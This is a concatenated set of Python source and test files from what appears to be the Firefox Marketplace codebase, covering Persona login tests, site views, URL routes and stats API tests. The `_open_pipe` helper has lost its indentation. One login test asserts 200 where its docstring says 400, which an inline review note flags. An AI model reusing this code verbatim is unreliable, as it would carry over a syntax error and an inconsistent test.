        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay',
             'email': '[email protected]'}))
        res = self.client.post(url, data=dict(assertion='fake-assertion',
                                              audience='fakeamo.org'))
        eq_(res.status_code, 200)
        # If they're already logged in we return fast.
        eq_(self.client.post(url).status_code, 200)
    @patch('requests.post')
    def test_browserid_unverified_login_success(self, http_request):
        """A success response from BrowserID results in a successful login."""
        # Preverified accounts should not be accessible to unverified
        # logins.
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay', 'unverified-email': '[email protected]'}))
        res = self.client.post(self.url, {'assertion': 'fake-assertion',
                                          'audience': 'fakeamo.org'})
        eq_(res.status_code, 401)
        eq_(self.user.reload().is_verified, True)
        # A completely unverified address should be able to log in.
        self.user.update(is_verified=False)
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay', 'unverified-email': '[email protected]'}))
        res = self.client.post(self.url, {'assertion': 'fake-assertion',
                                          'audience': 'fakeamo.org'})
        eq_(res.status_code, 200)
        eq_(self.user.reload().is_verified, False)
        # If the user is already logged in, then we return fast.
        eq_(self.client.post(self.url).status_code, 200)
    @patch('users.models.UserProfile.log_login_attempt')
    @patch('requests.post')
    def test_browserid_login_logged(self, http_request, log_login_attempt):
        # A successful Persona login is recorded as a login attempt.
        url = reverse('users.browserid_login')
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay', 'email': '[email protected]'}))
        self.client.post(url, data=dict(assertion='fake-assertion',
                                        audience='fakeamo.org'))
        log_login_attempt.assert_called_once_with(True)
    def _make_admin_user(self, email):
        """
        Create a user with at least one admin privilege.
        """
        p = UserProfile.objects.create(
            username='admin', email=email,
            password='hunter2', created=datetime.now(), pk=998)
        admingroup = Group.objects.create(rules='Users:Edit')
        GroupUser.objects.create(group=admingroup, user=p)
    def _browserid_login(self, email, http_request):
        # Helper: stub a successful verifier response and POST the login.
        http_request.return_value = FakeResponse(
            200, json.dumps({'status': 'okay', 'email': email}))
        return self.client.post(reverse('users.browserid_login'),
                                data=dict(assertion='fake-assertion',
                                          audience='fakeamo.org'))
    @patch('requests.post')
    def test_browserid_restricted_login(self, http_request):
        """
        A success response from BrowserID for accounts restricted to
        password login results in a 400 error, for which the frontend
        will display a message about the restriction.
        """
        email = '[email protected]'
        self._make_admin_user(email)
        res = self._browserid_login(email, http_request)
        # NOTE(review): the docstring above says restricted accounts should
        # get a 400, but this asserts 200 — confirm which is intended.
        eq_(res.status_code, 200)
    @patch('requests.post')
    @patch('users.views.record_action')
    def test_browserid_no_account(self, record_action, http_request):
        """
        BrowserID login for an email address with no account creates a
        new account.
        """
        email = '[email protected]'
        res = self._browserid_login(email, http_request)
        eq_(res.status_code, 200)
        profiles = UserProfile.objects.filter(email=email)
        eq_(len(profiles), 1)
        # Username/display name are derived from the email's local part.
        eq_(profiles[0].username, 'newuser')
        eq_(profiles[0].display_name, 'newuser')
    @patch('requests.post')
    @patch('users.views.record_action')
    def test_browserid_misplaced_auth_user(self, record_action, http_request):
        """
        Login still works even after the user has changed his email
        address on AMO.
        """
        url = reverse('users.browserid_login')
        profile = UserProfile.objects.create(username='login_test',
                                             email='[email protected]')
        profile.email = '[email protected]'
        profile.save()
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay',
             'email': '[email protected]'}))
        res = self.client.post(url, data=dict(assertion='fake-assertion',
                                              audience='fakeamo.org'))
        eq_(res.status_code, 200)
    @patch('requests.post')
    @patch('users.views.record_action')
    def test_browserid_no_auth_user(self, record_action, http_request):
        """
        Login still works after a new UserProfile has been created for an
        email address another UserProfile formerly used.
        """
        url = reverse('users.browserid_login')
        UserProfile.objects.get(email="[email protected]").update(
            email="[email protected]")
        UserProfile.objects.create(email="[email protected]")
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay',
             'email': '[email protected]'}))
        res = self.client.post(url, data=dict(assertion='fake-assertion',
                                              audience='fakeamo.org'))
        eq_(res.status_code, 200)
    @patch('requests.post')
    @patch('users.views.record_action')
    def test_browserid_no_mark_as_market(self, record_action, post):
        # Auto-created accounts get no special note on the profile.
        email = '[email protected]'
        self._browserid_login(email, post)
        profile = UserProfile.objects.get(email=email)
        assert not profile.notes
    @patch('requests.post')
    def test_browserid_login_failure(self, http_request):
        """
        A failure response from BrowserID results in login failure.
        """
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'busted'}))
        res = self.client.post(reverse('users.browserid_login'),
                               data=dict(assertion='fake-assertion',
                                         audience='fakeamo.org'))
        eq_(res.status_code, 401)
        assert 'Persona authentication failure' in res.content
    @patch('requests.post')
    @patch('users.views.record_action')
    def test_browserid_duplicate_username(self, record_action, post):
        # Colliding usernames get a numeric suffix appended.
        email = '[email protected]'  # existing
        post.return_value = FakeResponse(200, json.dumps({'status': 'okay',
                                                          'email': email}))
        res = self.client.post(reverse('users.browserid_login'),
                               data=dict(assertion='fake-assertion',
                                         audience='fakeamo.org'))
        eq_(res.status_code, 200)
        profiles = UserProfile.objects.filter(email=email)
        eq_(profiles[0].username, 'jbalogh2')
        eq_(profiles[0].display_name, 'jbalogh2')
        # Note: lower level unit tests for this functionality are in
        # TestAutoCreateUsername()
    @patch('requests.post')
    def create_profile(self, http_request):
        # Helper (not a test): authenticate a fresh email address and
        # return the auto-created profile.
        email = '[email protected]'
        http_request.return_value = FakeResponse(200,
                                                 json.dumps({'status': 'okay',
                                                             'email': email}))
        request = fake_request()
        browserid_authenticate(request=request, assertion='fake-assertion')
        return UserProfile.objects.get(email=email)
    @patch('users.views.record_action')
    def test_mmo_source(self, record_action):
        # Accounts created via Marketplace Persona are tagged accordingly.
        profile = self.create_profile()
        eq_(profile.source, amo.LOGIN_SOURCE_MMO_BROWSERID)
        assert record_action.called
    @patch.object(settings, 'NATIVE_BROWSERID_VERIFICATION_URL',
                  'http://my-custom-b2g-verifier.org/verify')
    @patch.object(settings, 'SITE_URL', 'http://testserver')
    @patch.object(settings, 'UNVERIFIED_ISSUER', 'some-issuer')
    @patch('requests.post')
    def test_mobile_persona_login(self, http_request):
        # is_mobile=1 routes verification to the native B2G verifier and
        # allows unverified emails.
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay',
             'email': '[email protected]'}))
        self.client.post(reverse('users.browserid_login'),
                         data=dict(assertion='fake-assertion',
                                   audience='fakeamo.org',
                                   is_mobile='1'))
        http_request.assert_called_with(
            settings.NATIVE_BROWSERID_VERIFICATION_URL,
            verify=ANY, proxies=ANY, data=ANY, timeout=ANY,
            headers=ANY)
        data = http_request.call_args[1]['data']
        eq_(data['audience'], 'http://testserver')
        eq_(data['experimental_forceIssuer'], settings.UNVERIFIED_ISSUER)
        eq_(data['experimental_allowUnverified'], 'true')
    @patch.object(settings, 'SITE_URL', 'http://testserver')
    @patch.object(settings, 'UNVERIFIED_ISSUER', 'some-issuer')
    @patch('requests.post')
    def test_non_mobile_persona_login(self, http_request):
        # Without is_mobile, unverified emails are not allowed.
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay',
             'email': '[email protected]'}))
        self.client.post(reverse('users.browserid_login'),
                         data=dict(assertion='fake-assertion',
                                   audience='fakeamo.org'))
        assert http_request.called
        data = http_request.call_args[1]['data']
        eq_(data['audience'], 'http://testserver')
        eq_(data['experimental_forceIssuer'], settings.UNVERIFIED_ISSUER)
        assert 'experimental_allowUnverified' not in data, (
            'not allowing unverfied when not native')
    @patch.object(settings, 'NATIVE_BROWSERID_VERIFICATION_URL',
                  'http://my-custom-b2g-verifier.org/verify')
    @patch.object(settings, 'SITE_URL', 'http://testserver')
    @patch.object(settings, 'UNVERIFIED_ISSUER', None)
    @patch('requests.post')
    def test_mobile_persona_login_without_issuer(self, http_request):
        # With no UNVERIFIED_ISSUER configured, no issuer is forced.
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay',
             'email': '[email protected]'}))
        self.client.post(reverse('users.browserid_login'),
                         data=dict(assertion='fake-assertion',
                                   audience='fakeamo.org',
                                   is_mobile='1'))
        data = http_request.call_args[1]['data']
        eq_(data['audience'], 'http://testserver')
        assert 'experimental_forceIssuer' not in data, (
            'not forcing issuer when the setting is blank')
    @patch('requests.post')
    def test_mobile_persona_login_ignores_garbage(self, http_request):
        # A nonsense is_mobile value must not break the login flow.
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay',
             'email': '[email protected]'}))
        self.client.post(reverse('users.browserid_login'),
                         data=dict(assertion='fake-assertion',
                                   audience='fakeamo.org',
                                   is_mobile='<garbage>'))
########NEW FILE########
__FILENAME__ = test_views
import json
from urlparse import urljoin
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
import mock
from lxml import etree
from nose import SkipTest
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
class Test403(amo.tests.TestCase):
    """Restricted areas must render the custom 403 page for plain users."""
    fixtures = ['base/users'] + fixture('webapp_337141')
    def setUp(self):
        # Log in as a regular (non-admin, non-reviewer) user.
        assert self.client.login(username='[email protected]',
                                 password='password')
    def _test_403(self, url):
        # Shared assertion: the URL must 403 using the site template.
        res = self.client.get(url, follow=True)
        eq_(res.status_code, 403)
        self.assertTemplateUsed(res, 'site/403.html')
    def test_403_admin(self):
        self._test_403('/admin')
    def test_403_devhub(self):
        # Log in as a user who is not the app's developer.
        assert self.client.login(username='[email protected]',
                                 password='password')
        app = Webapp.objects.get(pk=337141)
        self._test_403(app.get_dev_url('edit'))
    def test_403_reviewer(self):
        self._test_403('/reviewers')
class Test404(amo.tests.TestCase):
    """Unknown URLs render the custom 404 page; the API returns an empty
    body instead."""
    fixtures = fixture('webapp_337141')
    def _test_404(self, url):
        # Shared assertion: URL must 404 using the site template.
        r = self.client.get(url, follow=True)
        eq_(r.status_code, 404)
        self.assertTemplateUsed(r, 'site/404.html')
        return r
    def test_404(self):
        self._test_404('/xxx')
    def test_404_devhub(self):
        self._test_404('/developers/xxx')
    def test_404_consumer_legacy(self):
        self._test_404('/xxx')
    def test_404_consumer(self):
        self._test_404('/xxx')
    def test_404_api(self):
        # API 404s return an empty body, not the HTML template.
        res = self.client.get('/api/this-should-never-work/')
        eq_(res.status_code, 404)
        eq_(res.content, '')
class TestManifest(amo.tests.TestCase):
    """Tests for the Marketplace's own webapp manifest view."""
    def setUp(self):
        self.url = reverse('manifest.webapp')
    @mock.patch('mkt.carriers.carriers.CARRIERS', {'boop': 'boop'})
    @mock.patch.object(settings, 'WEBAPP_MANIFEST_NAME', 'Firefox Marketplace')
    @mock.patch('mkt.site.views.get_carrier')
    def test_manifest(self, mock_get_carrier):
        mock_get_carrier.return_value = 'boop'
        response = self.client.get(reverse('manifest.webapp'))
        eq_(response.status_code, 200)
        eq_(response['Content-Type'], 'application/x-web-app-manifest+json')
        content = json.loads(response.content)
        eq_(content['name'], 'Firefox Marketplace')
        url = reverse('manifest.webapp')
        # The manifest URL must not be locale- or app-prefixed.
        assert 'en-US' not in url and 'firefox' not in url
        # With an active carrier, launch_path points at its storefront.
        eq_(content['launch_path'], '/?carrier=boop')
    @mock.patch('mkt.carriers.carriers.CARRIERS', [])
    def test_manifest_no_carrier(self):
        # No carriers configured: no launch_path in the manifest.
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        content = json.loads(response.content)
        assert 'launch_path' not in content
    @mock.patch.object(settings, 'WEBAPP_MANIFEST_NAME', 'Mozilla Fruitstand')
    def test_manifest_name(self):
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        content = json.loads(response.content)
        eq_(content['name'], 'Mozilla Fruitstand')
    def test_manifest_orientation(self):
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        content = json.loads(response.content)
        eq_(content['orientation'], ['portrait-primary'])
    def test_manifest_etag(self):
        resp = self.client.get(self.url)
        etag = resp.get('Etag')
        assert etag, 'Missing ETag'
        # Trigger a change to the manifest by changing the name.
        with self.settings(WEBAPP_MANIFEST_NAME='Mozilla Fruitstand'):
            resp = self.client.get(self.url)
            assert resp.get('Etag'), 'Missing ETag'
            self.assertNotEqual(etag, resp.get('Etag'))
    def test_conditional_get_manifest(self):
        resp = self.client.get(self.url)
        etag = resp.get('Etag')
        # A matching If-None-Match yields an empty 304 response.
        resp = self.client.get(self.url, HTTP_IF_NONE_MATCH=str(etag))
        eq_(resp.content, '')
        eq_(resp.status_code, 304)
class TestMozmarketJS(amo.tests.TestCase):
    """Tests for the dynamically-built mozmarket.js bundle."""
    def setUp(self):
        # The view is cached; clear between tests so settings patches apply.
        cache.clear()
    def render(self):
        return self.client.get(reverse('site.mozmarket_js'))
    @mock.patch.object(settings, 'SITE_URL', 'https://secure-mkt.com/')
    @mock.patch.object(settings, 'MINIFY_MOZMARKET', False)
    def test_render(self):
        resp = self.render()
        self.assertContains(resp, "var server = 'https://secure-mkt.com/'")
        eq_(resp['Content-Type'], 'text/javascript')
    @mock.patch.object(settings, 'SITE_URL', 'https://secure-mkt.com/')
    @mock.patch.object(settings, 'MINIFY_MOZMARKET', True)
    def test_minify(self):
        resp = self.render()
        # Check for no space after equal sign.
        self.assertContains(resp, '="https://secure-mkt.com/"')
    @mock.patch.object(settings, 'MINIFY_MOZMARKET', True)
    @mock.patch.object(settings, 'UGLIFY_BIN', None)
    def test_minify_with_yui(self):
        # With no uglify binary the YUI fallback must still succeed.
        self.render() # no errors
    @mock.patch.object(settings, 'MINIFY_MOZMARKET', False)
    def test_receiptverifier(self):
        resp = self.render()
        self.assertContains(resp, 'exports.receipts.Verifier')
    @mock.patch.object(settings, 'MOZMARKET_VENDOR_EXCLUDE',
                       ['receiptverifier'])
    @mock.patch.object(settings, 'MINIFY_MOZMARKET', False)
    def test_exclude(self):
        # Excluded vendor libraries are left out of the bundle.
        resp = self.render()
        self.assertNotContains(resp, 'exports.receipts.Verifier')
class TestRobots(amo.tests.TestCase):
    """robots.txt invites or repels crawlers based on ENGAGE_ROBOTS."""
    @override_settings(CARRIER_URLS=['seavanworld'])
    @override_settings(ENGAGE_ROBOTS=True)
    def test_engage_robots(self):
        rs = self.client.get('/robots.txt')
        self.assertContains(rs, 'Allow: /')
        # Carrier storefront URLs are excluded from crawling.
        self.assertContains(rs, 'Disallow: /seavanworld/')
    @override_settings(ENGAGE_ROBOTS=False)
    def test_do_not_engage_robots(self):
        rs = self.client.get('/robots.txt')
        self.assertContains(rs, 'Disallow: /')
class TestOpensearch(amo.tests.TestCase):
    """The OpenSearch declaration and description document."""
    def test_opensearch_declaration(self):
        """Look for opensearch declaration in templates."""
        response = self.client.get(reverse('commonplace.fireplace'))
        elm = pq(response.content)(
            'link[rel=search][type="application/opensearchdescription+xml"]')
        eq_(elm.attr('href'), reverse('opensearch'))
        eq_(elm.attr('title'), 'Firefox Marketplace')
    def test_opensearch(self):
        response = self.client.get(reverse('opensearch'))
        eq_(response['Content-Type'], 'text/xml')
        eq_(response.status_code, 200)
        doc = etree.fromstring(response.content)
        e = doc.find('{http://a9.com/-/spec/opensearch/1.1/}ShortName')
        eq_(e.text, 'Firefox Marketplace')
        e = doc.find('{http://a9.com/-/spec/opensearch/1.1/}Url')
        # The search URL template points at the site-wide search endpoint.
        wanted = '%s?q={searchTerms}' % urljoin(settings.SITE_URL, '/search')
        eq_(e.attrib['template'], wanted)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
# Site-level URL routes: manifests, robots.txt, opensearch and timing.
urlpatterns = patterns('',
    url('^mozmarket.js$', views.mozmarket_js, name='site.mozmarket_js'),
    url('^robots.txt$', views.robots, name='robots.txt'),
    # Replace opensearch.xml from amo with a specific one for Marketplace.
    url('^opensearch.xml$', views.OpensearchView.as_view(), name='opensearch'),
    # These are the new manifest URLs going forward.
    url('^hosted.webapp$', views.manifest, name='hosted.webapp'),
    url('^packaged.webapp$', views.package_minifest, name='packaged.webapp'),
    url('^marketplace-package.webapp$', views.yogafire_minifest,
        name='packaged-marketplace.webapp'),
    # TODO: Deprecate this in favour of the ones above.
    url('^manifest.webapp$', views.manifest, name='manifest.webapp'),
    url('^minifest.webapp$', views.package_minifest, name='minifest.webapp'),
    url('^timing/record$', views.record, name='mkt.timing.record'),
)
########NEW FILE########
__FILENAME__ = views
import hashlib
import json
import logging
import os
import subprocess
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.http import (HttpResponse, HttpResponseNotFound,
HttpResponseServerError)
from django.shortcuts import render
from django.template import RequestContext
from django.views.decorators.cache import cache_page
from django.views.decorators.csrf import csrf_exempt, requires_csrf_token
from django.views.decorators.http import etag
from django.views.generic.base import TemplateView
import jingo_minify
from django_statsd.clients import statsd
from django_statsd.views import record as django_statsd_record
from jingo import render_to_string
from amo.context_processors import get_collect_timings
from amo.decorators import post_required
from amo.helpers import media
from amo.utils import urlparams
from mkt.carriers import get_carrier
from mkt.detail.views import manifest as mini_manifest
log = logging.getLogger('z.mkt.site')
# This can be called when CsrfViewMiddleware.process_view has not run,
# therefore needs @requires_csrf_token in case the template needs
# {% csrf_token %}.
@requires_csrf_token
def handler403(request):
    """Render the site-wide 403 (forbidden) error page."""
    # TODO: Bug 793241 for different 403 templates at different URL paths.
    return render(request, 'site/403.html', status=403)
def handler404(request):
    """Render the 404 page; API requests get an empty body instead."""
    if request.path_info.startswith('/api/'):
        # Pass over to API handler404 view if API was targeted.
        return HttpResponseNotFound()
    return render(request, 'site/404.html', status=404)
def handler500(request):
    """Render the 500 page; API requests get an empty body instead."""
    if request.path_info.startswith('/api/'):
        # Pass over to API handler500 view if API was targeted.
        return HttpResponseServerError()
    return render(request, 'site/500.html', status=500)
def csrf_failure(request, reason=''):
    """Render the 403 page, flagging CSRF-specific failures for the template."""
    context = {'because_csrf': 'CSRF' in reason}
    return render(request, 'site/403.html', context, status=403)
def manifest(request):
    """Serve the Marketplace's own web app manifest as JSON with an ETag."""
    ctx = RequestContext(request)
    data = {
        'name': getattr(settings, 'WEBAPP_MANIFEST_NAME',
                        'Firefox Marketplace'),
        'description': 'The Firefox Marketplace',
        'developer': {
            'name': 'Mozilla',
            'url': 'http://mozilla.org',
        },
        'icons': {
            # Using the default addon image until we get a marketplace logo.
            '128': media(ctx, 'img/mkt/logos/128.png'),
            '64': media(ctx, 'img/mkt/logos/64.png'),
            '32': media(ctx, 'img/mkt/logos/32.png'),
        },
        'activities': {
            'marketplace-app': {'href': '/'},
            'marketplace-app-rating': {'href': '/'},
            'marketplace-category': {'href': '/'},
            'marketplace-search': {'href': '/'},
        },
        'orientation': ['portrait-primary']
    }
    if get_carrier():
        # Launch straight into the active carrier's storefront.
        data['launch_path'] = urlparams('/', carrier=get_carrier())
    manifest_content = json.dumps(data)
    manifest_etag = hashlib.sha256(manifest_content).hexdigest()
    # Wrap the response in an inner view so the @etag decorator can hash the
    # content we just built (enables conditional 304 responses).
    @etag(lambda r: manifest_etag)
    def _inner_view(request):
        response = HttpResponse(manifest_content,
                                mimetype='application/x-web-app-manifest+json')
        return response
    return _inner_view(request)
def package_minifest(request):
    """Serve mini manifest ("minifest") for Yulelog's packaged `.zip`."""
    guid = settings.MARKETPLACE_GUID
    if not guid:
        return HttpResponseNotFound()
    return mini_manifest(request, guid)
def yogafire_minifest(request):
    """Serve mini manifest ("minifest") for Yogafire's packaged `.zip`."""
    guid = settings.YOGAFIRE_GUID
    if not guid:
        return HttpResponseNotFound()
    return mini_manifest(request, guid)
def robots(request):
    """Generate a `robots.txt`."""
    # Previously this rendered a full HttpResponse via render() and then
    # re-wrapped its content in a second HttpResponse. Rendering directly
    # with the right content type produces the same body in one step.
    return render(request, 'site/robots.txt', content_type='text/plain')
@csrf_exempt
@post_required
def record(request):
    """Record client-side timing data via django-statsd.

    Collection is gated server-side so it can be disabled entirely.
    """
    # The rate limiting is done up on the client, but if things go wrong
    # we can just turn the percentage down to zero.
    if get_collect_timings():
        return django_statsd_record(request)
    raise PermissionDenied
# Cache this for an hour so that newly deployed changes are available within
# an hour. This will be served from the CDN which mimics these headers.
@cache_page(60 * 60)
def mozmarket_js(request):
    """Serve the mozmarket JS bundle, inlining vendored libraries."""
    vendor_js = []
    for lib, path in (('receiptverifier',
                       'receiptverifier/receiptverifier.js'),):
        # Skip vendored libraries excluded via settings.
        if lib in settings.MOZMARKET_VENDOR_EXCLUDE:
            continue
        with open(os.path.join(settings.ROOT,
                               'vendor', 'js', path), 'r') as fp:
            vendor_js.append((lib, fp.read()))
    js = render_to_string(request, 'site/mozmarket.js',
                          {'vendor_js': vendor_js})
    if settings.MINIFY_MOZMARKET:
        js = minify_js(js)
    return HttpResponse(js, content_type='text/javascript')
@statsd.timer('mkt.mozmarket.minify')
def minify_js(js):
    """Minify *js*, preferring uglify when a binary is configured."""
    if not settings.UGLIFY_BIN:
        # The YUI fallback here is important because YUI compressor is
        # bundled with jingo minify and therefore doesn't require any deps.
        log.info('minifying JS with YUI')
        return _minify_js_with_yui(js)
    log.info('minifying JS with uglify')
    return _minify_js_with_uglify(js)
def _minify_js_with_uglify(js):
    """Pipe *js* through the configured uglify binary; raise on failure."""
    proc = _open_pipe([settings.UGLIFY_BIN])
    minified, err = proc.communicate(js)
    if proc.returncode:
        raise ValueError('Compressing JS with uglify failed; error: %s'
                         % err.strip())
    return minified
def _minify_js_with_yui(js):
    """Pipe *js* through the YUI compressor jar bundled with jingo_minify."""
    jar = os.path.join(os.path.dirname(jingo_minify.__file__), 'bin',
                       'yuicompressor-2.4.7.jar')
    if not os.path.exists(jar):
        raise ValueError('Could not find YUI compressor; tried %r' % jar)
    proc = _open_pipe([settings.JAVA_BIN, '-jar', jar, '--type', 'js',
                       '--charset', 'utf8'])
    minified, err = proc.communicate(js)
    if proc.returncode:
        raise ValueError('Compressing JS with YUI failed; error: %s'
                         % err.strip())
    return minified
def _open_pipe(cmd):
return subprocess.Popen(cmd,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
class OpensearchView(TemplateView):
    """Serve the Marketplace OpenSearch description document as XML."""
    content_type = 'text/xml'
    template_name = 'mkt/opensearch.xml'
########NEW FILE########
__FILENAME__ = forms
from django import forms
import happyforms
from tower import ugettext_lazy as _lazy
# Aggregation intervals accepted by the stats API.
INTERVAL_CHOICES = (
    # Elasticsearch supports minute and hour but we don't.
    ('day', _lazy('Day')),
    ('week', _lazy('Week')),
    ('month', _lazy('Month')),
    ('quarter', _lazy('Quarter')),
    ('year', _lazy('Year')),
)
# Accepted date formats: ISO (2013-04-01) and compact (20130401).
DATE_INPUT_FORMATS = ('%Y-%m-%d', '%Y%m%d')
class StatsForm(happyforms.Form):
    """Validates start/end/interval query parameters for stats endpoints."""
    start = forms.DateField(required=True, input_formats=DATE_INPUT_FORMATS)
    end = forms.DateField(required=True, input_formats=DATE_INPUT_FORMATS)
    interval = forms.ChoiceField(required=True, choices=INTERVAL_CHOICES,
                                 initial='day')
########NEW FILE########
__FILENAME__ = test_forms
from nose.tools import eq_, ok_
import amo.tests
from mkt.stats.forms import StatsForm
class TestStatsForm(amo.tests.TestCase):
    """Validation tests for StatsForm."""

    def setUp(self):
        # A fully valid set of query parameters.
        self.data = {'start': '2013-04-01',
                     'end': '2013-04-15',
                     'interval': 'day'}

    def _check(self, form, valid, fields):
        # Assert overall validity and that exactly `fields` carry errors.
        eq_(form.is_valid(), valid)
        eq_(len(form.errors), len(fields))
        for name in fields:
            ok_(name in form.errors)

    def test_good(self):
        form = StatsForm(self.data)
        ok_(form.is_valid(), form.errors)

    def test_no_values(self):
        self._check(StatsForm({}), False, ['start', 'end', 'interval'])

    def test_other_date_format(self):
        self.data['start'] = '20130401'
        form = StatsForm(self.data)
        ok_(form.is_valid(), form.errors)

    def test_bad_date(self):
        self.data['start'] = 'abc'
        self._check(StatsForm(self.data), False, ['start'])

    def test_interval(self):
        self.data['interval'] = 'second'
        self._check(StatsForm(self.data), False, ['interval'])
########NEW FILE########
__FILENAME__ = test_views
import json
import mock
import requests
from nose.tools import eq_, ok_
from rest_framework.reverse import reverse
from django.conf import settings
import amo
from stats.models import Contribution
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.stats.views import APP_STATS, STATS, _get_monolith_data
class StatsAPITestMixin(object):
    """Shared tests for stats API endpoints backed by monolith.

    Host classes must provide `url()` and `self.data`.
    """
    def setUp(self):
        super(StatsAPITestMixin, self).setUp()
        # Patch out the monolith client and point at a dummy server so the
        # tests never touch the network.
        patches = [
            mock.patch('monolith.client.Client'),
            mock.patch.object(settings, 'MONOLITH_SERVER', 'http://0.0.0.0:0'),
        ]
        for patch in patches:
            patch.start()
            self.addCleanup(patch.stop)
    def test_cors(self):
        res = self.client.get(self.url(), data=self.data)
        self.assertCORS(res, 'get')
    def test_verbs(self):
        # Only GET is allowed on stats endpoints.
        self._allowed_verbs(self.url(), ['get'])
    @mock.patch('monolith.client.Client')
    def test_monolith_down(self, mocked):
        # A connection failure to monolith surfaces as 503.
        mocked.side_effect = requests.ConnectionError
        res = self.client.get(self.url(), data=self.data)
        eq_(res.status_code, 503)
    def test_anon(self):
        # Anonymous users are forbidden.
        res = self.anon.get(self.url())
        eq_(res.status_code, 403)
class TestGlobalStatsResource(StatsAPITestMixin, RestOAuth):
    """Tests for the global (site-wide) stats endpoint."""

    def setUp(self):
        super(TestGlobalStatsResource, self).setUp()
        self.grant_permission(self.profile, 'Stats:View')
        self.data = {'start': '2013-04-01',
                     'end': '2013-04-15',
                     'interval': 'day'}

    def url(self, metric=None):
        # Default to any valid metric when the test doesn't care which.
        metric = metric or STATS.keys()[0]
        return reverse('global_stats', kwargs={'metric': metric})

    def test_bad_metric(self):
        res = self.client.get(self.url('foo'))
        eq_(res.status_code, 404)

    def test_missing_args(self):
        res = self.client.get(self.url())
        eq_(res.status_code, 400)
        data = json.loads(res.content)
        for f in ('start', 'end', 'interval'):
            eq_(data['detail'][f], ['This field is required.'])

    def test_good(self):
        res = self.client.get(self.url(), data=self.data)
        eq_(res.status_code, 200)
        eq_(json.loads(res.content)['objects'], [])

    @mock.patch('monolith.client.Client')
    def test_dimensions(self, mocked):
        # Explicit query-string dimensions are forwarded to monolith.
        client = mock.MagicMock()
        mocked.return_value = client
        data = self.data.copy()
        data.update({'region': 'br', 'package_type': 'hosted'})
        res = self.client.get(self.url('apps_added_by_package'), data=data)
        eq_(res.status_code, 200)
        ok_(client.called)
        eq_(client.call_args[1], {'region': 'br', 'package_type': 'hosted'})

    @mock.patch('monolith.client.Client')
    def test_dimensions_default(self, mocked):
        # Omitted dimensions fall back to the defaults declared in STATS.
        client = mock.MagicMock()
        mocked.return_value = client
        res = self.client.get(self.url('apps_added_by_package'),
                              data=self.data)
        eq_(res.status_code, 200)
        ok_(client.called)
        eq_(client.call_args[1], {'region': 'us', 'package_type': 'hosted'})

    @mock.patch('monolith.client.Client')
    def test_dimensions_default_is_none(self, mocked):
        # A None default means the dimension is omitted unless supplied.
        client = mock.MagicMock()
        mocked.return_value = client
        res = self.client.get(self.url('apps_installed'), data=self.data)
        eq_(res.status_code, 200)
        ok_(client.called)
        eq_(client.call_args[1], {})
        data = self.data.copy()
        data['region'] = 'us'
        res = self.client.get(self.url('apps_installed'), data=data)
        eq_(res.status_code, 200)
        ok_(client.called)
        eq_(client.call_args[1], {'region': 'us'})

    @mock.patch('monolith.client.Client')
    def test_coersion(self, mocked):
        # The 'coerce' config converts monolith values (here float -> str).
        client = mock.MagicMock()
        client.return_value = [{'count': 1.99, 'date': '2013-10-10'}]
        mocked.return_value = client
        data = _get_monolith_data(
            {'metric': 'foo', 'coerce': {'count': str}}, '2013-10-10',
            '2013-10-10', 'day', {})
        eq_(type(data['objects'][0]['count']), str)
class TestAppStatsResource(StatsAPITestMixin, RestOAuth):
    """Tests for the per-app stats endpoint (owner or Stats:View access)."""
    fixtures = fixture('user_2519')

    def setUp(self):
        super(TestAppStatsResource, self).setUp()
        self.app = amo.tests.app_factory(status=amo.STATUS_PUBLIC)
        # Make the request user an owner of the app.
        self.app.addonuser_set.create(user=self.user)
        self.data = {'start': '2013-04-01', 'end': '2013-04-15',
                     'interval': 'day'}

    def url(self, pk=None, metric=None):
        pk = pk or self.app.pk
        # Default to any valid metric when the test doesn't care which.
        metric = metric or APP_STATS.keys()[0]
        return reverse('app_stats', kwargs={'pk': pk, 'metric': metric})

    def test_owner(self):
        res = self.client.get(self.url(), data=self.data)
        eq_(res.status_code, 200)

    def test_perms(self):
        # Non-owners can still read stats with the Stats:View permission.
        self.app.addonuser_set.all().delete()
        self.grant_permission(self.profile, 'Stats:View')
        res = self.client.get(self.url(), data=self.data)
        eq_(res.status_code, 200)

    def test_bad_app(self):
        res = self.client.get(self.url(pk=99999999))
        eq_(res.status_code, 404)

    def test_bad_metric(self):
        res = self.client.get(self.url(metric='foo'))
        eq_(res.status_code, 404)

    def test_missing_args(self):
        res = self.client.get(self.url())
        eq_(res.status_code, 400)
        data = json.loads(res.content)
        for f in ('start', 'end', 'interval'):
            eq_(data['detail'][f], ['This field is required.'])
class TestGlobalStatsTotalResource(StatsAPITestMixin, RestOAuth):
    """Tests for the global statistical-totals endpoint."""
    fixtures = fixture('user_2519')

    def setUp(self):
        super(TestGlobalStatsTotalResource, self).setUp()
        self.grant_permission(self.profile, 'Stats:View')
        # The mixin tests send `data` as the query string; totals need none.
        self.data = None

    def url(self):
        return reverse('global_stats_total')

    def test_perms(self):
        eq_(self.client.get(self.url()).status_code, 200)
class TestAppStatsTotalResource(StatsAPITestMixin, RestOAuth):
    """Tests for the per-app statistical-totals endpoint."""
    fixtures = fixture('user_2519')

    def setUp(self):
        super(TestAppStatsTotalResource, self).setUp()
        self.app = amo.tests.app_factory(status=amo.STATUS_PUBLIC)
